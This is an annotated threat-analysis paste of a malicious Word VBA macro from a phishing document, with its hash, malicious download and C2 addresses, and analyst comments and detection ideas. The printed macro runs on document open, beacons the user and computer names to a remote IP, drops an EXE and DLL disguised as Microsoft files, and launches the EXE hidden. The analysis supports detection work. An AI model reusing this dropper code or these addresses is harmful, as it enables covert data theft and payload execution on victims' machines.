cs0sf

[Macro] Timelines - ECRL.docx

Mar 27th, 2019
  1. # Malicious Macro from - https://twitter.com/ClearskySec/status/1110941178231484417
  2. # Filehash (32 hex characters, i.e. MD5-length): 67dafac37ca130af3f818ab927ad5bcc
  3. # Size: 18623
  4. # Filename: Timelines - ECRL.docx
  5. # Malicious URLs
  6. # - http://167.99.72.82/main.dotm - Malicious DOCM
  7. # - http://195.12.50.168/D2_de2o@sp0/ - C2
  8.  
  9. Rem Attribute VBA_ModuleType=VBADocumentModule
  10. Option VBASupport 1
      ' NOTE(review): the two lines above resemble what LibreOffice writes when it
      ' imports a VBA project ("Option VBASupport" is a LibreOffice Basic option).
      ' Presumably artefacts of how the macro was extracted, not author code - confirm.
  11. Option Explicit
      ' Imports of three user32 clipboard functions. Both branches declare the same
      ' functions; the VBA7 branch only adds the PtrSafe keyword.
      ' Document_Open calls all three as its last step to empty the clipboard
      ' after it has used Selection.Copy on the embedded shapes.
  12. #If VBA7 Then
  13.     Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
  14.     Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
  15.     Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
  16. #Else
  17.     Private Declare Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
  18.     Private Declare Function EmptyClipboard Lib "user32" () As Long
  19.     Private Declare Function CloseClipboard Lib "user32" () As Long
  20. #End If
  21.  
  22. Private Sub Document_Open()
          ' Analyst summary: Word event handler that runs when the document is opened
          ' (with macros enabled). As written it (1) sends the user name and computer
          ' name to a remote host over HTTP, (2) copies two files named after embedded
          ' shapes from %TMP% into %LOCALAPPDATA%\Microsoft\Windows\, (3) hides one
          ' shape and un-hides the document text, (4) launches the copied EXE with a
          ' hidden window, and (5) empties the clipboard.
          ' Detection ideas grounded in this code: Word writing WinWord.exe / mpsvc.dll
          ' under %LOCALAPPDATA%\Microsoft\Windows\, Word spawning a process from that
          ' path, and WinHTTP GETs to /index.html with u=/h= or a=exe/a=run parameters.
  23.     On Error Resume Next
          ' Every runtime error below is ignored, so a failed request or copy does not
          ' surface to the user.
  24.     Dim iShape As Shape
  25.     Dim EmbeddedEXEFileName As String
  26.     Dim EmbeddedDllFileName As String
  27.     Dim OutPutEXEName As String
  28.     Dim OutPutDllName As String
  29.     Dim DLLReleased As Boolean
  30.     Dim EXEReleased As Boolean
  31.     Dim sHostName As String
  32.     Dim sUserName As String
  33.     Dim myurl As String
  34.     Dim MyRequest As Object
          ' WinHTTP COM object, reused for every status request in this Sub.
  35.     Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
  36.     sHostName = Environ$("computername")
  37.     sUserName = Environ$("username")
          ' First beacon: user name and computer name go out in clear text in the query
          ' string (plain http://).
          ' NOTE(review): the host here is written "1167.99.72.82", whose first octet is
          ' not a valid IPv4 value; the paste header lists 167.99.72.82. Possibly a
          ' transcription or author typo - confirm against the sample, and match on both
          ' strings when hunting.
  38.     myurl = "http://1167.99.72.82/index.html?u=" + sUserName + "&h=" + sHostName
  39.     MyRequest.Open "GET", _
  40.     myurl
  41.     MyRequest.Send
          ' Names of the embedded shapes to look for; the same strings are used as file
          ' names under %TMP% in the FileCopy calls below.
  42.     EmbeddedEXEFileName = "189acd0ce3b06b9193ce"
  43.     EmbeddedDllFileName = "663f2fe952b29a8d14f5"
          ' Drop paths inside the user profile, so no elevation is needed to write them.
          ' NOTE(review): both file names imitate Microsoft components (WinWord.exe is
          ' Word's own binary name; mpsvc.dll is also the name of a Microsoft Defender
          ' DLL). An EXE placed next to a DLL with such a name suggests DLL side-loading;
          ' this macro does not show that - verify against the dropped payloads.
  44.     OutPutEXEName = Environ("localappdata") + "\Microsoft\Windows\WinWord.exe"
  45.     OutPutDllName = Environ("localappdata") + "\Microsoft\Windows\mpsvc.dll"
  46.     DLLReleased = False
  47.     EXEReleased = False
  48.     For Each iShape In ActiveDocument.Shapes
  49.         If iShape.Name = EmbeddedEXEFileName Then
                  ' Select + Copy the shape, then copy %TMP%\<shape name> to the EXE path.
                  ' NOTE(review): nothing here writes that temp file explicitly; presumably
                  ' copying the embedded object makes Word materialise it in %TMP% - confirm.
  50.             iShape.Select
  51.             Selection.Copy
  52.             FileCopy Environ("TMP") & "\" & EmbeddedEXEFileName, OutPutEXEName
                  ' Set unconditionally; with On Error Resume Next a failed FileCopy still
                  ' leaves this flag True.
  53.             EXEReleased = True
                  ' Status beacon: a=exe.
  54.             myurl = "http://1167.99.72.82/index.html?a=exe"
  55.             MyRequest.Open "GET", _
  56.             myurl
  57.             MyRequest.Send
  58.         ElseIf iShape.Name = EmbeddedDllFileName Then
                  ' Same sequence for the DLL.
  59.             iShape.Select
  60.             Selection.Copy
  61.             FileCopy Environ("TMP") & "\" & EmbeddedDllFileName, OutPutDllName
  62.             DLLReleased = True
                  ' myurl is not reassigned in this branch, so this request repeats whichever
                  ' URL was set last (the u=/h= beacon or the a=exe one, depending on shape
                  ' order); there is no distinct request for the DLL step.
  63.             MyRequest.Open "GET", _
  64.             myurl
  65.             MyRequest.Send
  66.         ElseIf iShape.Name = "4862e6f290cff1334b77" Then
                  ' Hides this shape and clears the Hidden font attribute on the whole
                  ' document body. NOTE(review): presumably the shape is the lure shown
                  ' before macros run and the hidden text is the decoy content - confirm.
  67.             'MsgBox "Show Normal Content -> " & iShape.Name
  68.            iShape.Visible = msoFalse
  69.             ActiveDocument.Content.Font.Hidden = False
  70.         End If
  71.     Next iShape
          ' Execution happens only if both flags are set; vbHide starts the process
          ' with a hidden window. Parent process is Word.
  72.     If DLLReleased = True And EXEReleased = True Then
  73.         Shell OutPutEXEName, vbHide
              ' Status beacon: a=run.
  74.         myurl = "http://1167.99.72.82/index.html?a=run"
  75.         MyRequest.Open "GET", _
  76.         myurl
  77.         MyRequest.Send
  78.     End If
          ' Empties the clipboard, removing what Selection.Copy placed there above.
  79.     OpenClipboard (0&)
  80.     EmptyClipboard
  81.     CloseClipboard
  82. End Sub